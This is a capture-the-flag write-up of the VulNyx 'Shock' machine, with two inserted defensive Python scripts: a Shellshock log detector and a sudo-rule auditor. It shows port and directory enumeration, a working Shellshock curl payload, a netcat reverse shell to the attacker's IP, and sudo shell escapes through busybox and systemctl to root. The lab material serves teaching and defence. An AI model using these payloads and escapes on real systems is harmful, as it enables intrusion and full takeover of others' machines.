🔵 NYX - Shock
#vulnyx
#nyx
#linux
#shellshock
#cve-2014-6271
#busybox (sudo)
#systemctl (sudo)
August 9, 2023 by Miguel R. (d4t4s3c)
Information
Shock is a Linux machine from the VulNyx platform; it has a low difficulty level and was created by the user m0w.
- Initial access: the Shellshock vulnerability (CVE-2014-6271) is detected and exploited.
- Privilege escalation: the user has sudo permissions on a binary, which allows breaking out into a shell as root.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-19 15:25 CET
Nmap scan report for 192.168.1.81
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp open ssh
80/tcp open http
❯ nmap -sVC -p22,80 192.168.1.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-19 15:26 CET
Nmap scan report for 192.168.1.81
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
| 256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_ 256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Shell (www-data)
80/TCP (HTTP)
Directory Brute Force
I find the /cgi-bin path
❯ gobuster dir -w /opt/common.txt -u http://192.168.1.81/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.81/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/ (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 20]
Progress: 4727 / 4727 (100.00%)
===============================================================
Finished
===============================================================
The /cgi-bin path is a directory reserved by the web server that stores CGI scripts, which are not part of the HTML standard; knowing this, I fuzz for files with the extensions those scripts may use.
❯ gobuster dir -w /opt/common.txt -u http://192.168.1.81/cgi-bin/ -x sh,cgi,py,pl
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.81/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: sh,cgi,py,pl
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/shell.sh (Status: 500) [Size: 610]
Progress: 23635 / 23635 (100.00%)
===============================================================
Finished
===============================================================
In the /cgi-bin path I find the file shell.sh
Shellshock (CVE-2014-6271)
I confirm that it is vulnerable to Shellshock by executing commands as the www-data user
❯ curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'id'" "http://192.168.1.81/cgi-bin/shell.sh"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
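A defender-side check for this stage, added here as an example and not part of the original writeup: Apache's default combined log format records the request line and the User-Agent, so a probe like the one above leaves the bash function-definition marker `() {` in access.log. The script below parses constructed sample log lines (not captured traffic; the IP addresses and timestamps are made up for the example) and reports which client sent Shellshock-shaped headers to which path. Function and variable names are this example's own.

```python
import re
from collections import Counter

# Apache "combined" log format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# Both the request line and the User-Agent are logged, so a Shellshock probe
# delivered in a header lands in access.log.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The Shellshock trigger is an exported value that starts with a bash function
# definition, "() {". Probes vary the whitespace, so allow any amount of it.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Constructed sample lines for this example (not captured traffic): two probes
# against the CGI script from the writeup plus two benign requests.
SAMPLE_LOG = """\
192.168.1.10 - - [19/Feb/2025:15:30:01 +0100] "GET /cgi-bin/shell.sh HTTP/1.1" 200 54 "-" "() { :; }; echo; /bin/bash -c 'id'"
192.168.1.10 - - [19/Feb/2025:15:30:02 +0100] "GET /index.html HTTP/1.1" 200 20 "-" "curl/8.5.0"
10.0.0.7 - - [19/Feb/2025:15:31:10 +0100] "GET /cgi-bin/shell.sh HTTP/1.1" 500 610 "-" "(){ :;}; /bin/bash -c 'id'"
10.0.0.8 - - [19/Feb/2025:15:31:11 +0100] "GET /cgi-bin/shell.sh HTTP/1.1" 500 610 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

def parse_combined(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None

def find_shellshock_attempts(lines):
    """Return one record per request whose logged fields carry the Shellshock marker."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        # Any header the CGI module exports into the environment can carry the
        # payload, so check every logged field, not only the User-Agent.
        for field in ("ua", "referer", "path"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({"ip": rec["ip"], "path": rec["path"], "status": rec["status"],
                             "field": field, "value": rec[field]})
                break
    return hits

def count_by_source(hits):
    """Number of Shellshock-shaped requests per client IP, for triage."""
    return Counter(h["ip"] for h in hits)

if __name__ == "__main__":
    found = find_shellshock_attempts(SAMPLE_LOG.splitlines())
    for h in found:
        print(f'{h["ip"]} -> {h["path"]} (HTTP {h["status"]}) via {h["field"]}: {h["value"]}')
    print(dict(count_by_source(found)))
```

Run against a real access.log with `find_shellshock_attempts(open("/var/log/apache2/access.log"))`; a 200 on a CGI path next to a marker is the case to escalate, since a 500 usually means the request reached the script but the command did not complete.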
Reverse Shell
❯ curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'nc -e /bin/sh 192.168.1.10 443'" "http://192.168.1.81/cgi-bin/shell.sh"
I get a shell as the www-data user
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.81] 57676
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shock
Shell (will)
The www-data user can run the busybox binary as will with sudo
bash-4.3$ sudo -l
Matching Defaults entries for www-data on shock:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on shock:
(will) NOPASSWD: /usr/bin/busybox
GTFOBins gives us the one-liner to break out into a shell
bash-4.3$ sudo -u will /usr/bin/busybox sh
BusyBox v1.30.1 (Debian 1:1.30.1-4) built-in shell (ash)
Enter 'help' for a list of built-in commands.
/usr/lib/cgi-bin $ id ; hostname
uid=1001(will) gid=1001(will) groups=1001(will)
shock
/usr/lib/cgi-bin $ bash -i
will@shock:/usr/lib/cgi-bin$
Privilege Escalation
The will user can run the systemctl binary as root with sudo
will@shock:~$ sudo -l
Matching Defaults entries for will on shock:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User will may run the following commands on shock:
(root) NOPASSWD: /usr/bin/systemctl
GTFOBins gives us the one-liner to break out into a shell
will@shock:~$ sudo -u root /usr/bin/systemctl
When systemctl runs it opens in paginated mode, and with !/bin/sh I become the root user
!/bin/bash
root@shock:/home/will# id ; hostname
uid=0(root) gid=0(root) groups=0(root)
shock
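An audit of the two `sudo -l` outputs shown above, added here as an example and not part of the original writeup. The script parses `sudo -l` output in the form printed above (English locale assumed), flags rules whose command is one of the binaries the writeup uses to break out into a shell (busybox and systemctl, both on GTFOBins; a real audit would extend that set from GTFOBins), and walks the rules as a graph to show that www-data reaches root in two hops. The two sample outputs are copies of the ones in the writeup; the function and variable names are this example's own.

```python
import re
from collections import deque

# One rule line from the "User X may run the following commands" part of
# `sudo -l` (English locale assumed), e.g.
#   (will) NOPASSWD: /usr/bin/busybox
#   (root) NOPASSWD: /usr/bin/systemctl, /bin/ls
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$')
USER_RE = re.compile(r'^User (?P<user>\S+) may run the following commands on')

# Binaries the writeup uses to break out into a shell under sudo (both on GTFOBins).
# A real audit extends this set from GTFOBins; "ALL" is always treated as risky.
SHELL_ESCAPE_BINARIES = {"busybox", "systemctl"}

# Copies of the two `sudo -l` outputs from the writeup, used as sample input.
SUDO_L_WWW_DATA = r"""
Matching Defaults entries for www-data on shock:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on shock:
    (will) NOPASSWD: /usr/bin/busybox
"""
SUDO_L_WILL = r"""
Matching Defaults entries for will on shock:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User will may run the following commands on shock:
    (root) NOPASSWD: /usr/bin/systemctl
"""

def parse_sudo_l(text):
    """Return (user, rules) from `sudo -l` output; each rule is a dict with runas/nopasswd/cmd."""
    user, rules = None, []
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user = m.group("user")
            continue
        if user is None:
            continue  # still inside the "Matching Defaults entries" block
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        runas = m.group("runas").split(":")[0].strip()  # "(root)" or "(root : root)"
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": runas, "nopasswd": "NOPASSWD" in tags, "cmd": cmd.strip()})
    return user, rules

def audit_rules(user, rules):
    """Flag rules that let `user` obtain an interactive shell as another account."""
    findings = []
    for r in rules:
        base = r["cmd"].rsplit("/", 1)[-1]
        if r["cmd"] != "ALL" and base not in SHELL_ESCAPE_BINARIES:
            continue
        severity = "critical" if r["runas"] in ("root", "ALL") else "high"
        findings.append({"user": user, "runas": r["runas"], "cmd": r["cmd"],
                         "nopasswd": r["nopasswd"], "severity": severity})
    return findings

def escalation_path(sudo_outputs, start, target="root"):
    """Breadth-first search over flagged rules: the chain of accounts from `start`
    to `target`, or None if the rules do not connect them."""
    edges = {}
    for text in sudo_outputs:
        user, rules = parse_sudo_l(text)
        edges[user] = {f["runas"] for f in audit_rules(user, rules)}
    queue, seen = deque([[start]]), {start}
    while queue:
        path = queue.popleft()
        if path[-1] == target:
            return path
        for nxt in sorted(edges.get(path[-1], ())):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None

if __name__ == "__main__":
    for text in (SUDO_L_WWW_DATA, SUDO_L_WILL):
        for f in audit_rules(*parse_sudo_l(text)):
            print(f'[{f["severity"]}] {f["user"]} -> {f["runas"]} via {f["cmd"]} (NOPASSWD={f["nopasswd"]})')
    print(escalation_path([SUDO_L_WWW_DATA, SUDO_L_WILL], "www-data"))
```

The fix on the machine side is to drop both rules or restrict them to specific subcommands; an audit that runs this over `sudo -l -U <user>` for every account on the host reproduces the same chain without anyone having to log in as those users.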
Flags
Now as the root user I can read the flags user.txt and root.txt
root@shock:/home/will# find / -name user.txt -o -name root.txt |xargs cat
f47fa6**************************
0afcf8**************************
This concludes the resolution of the Shock machine.
Happy Hacking!
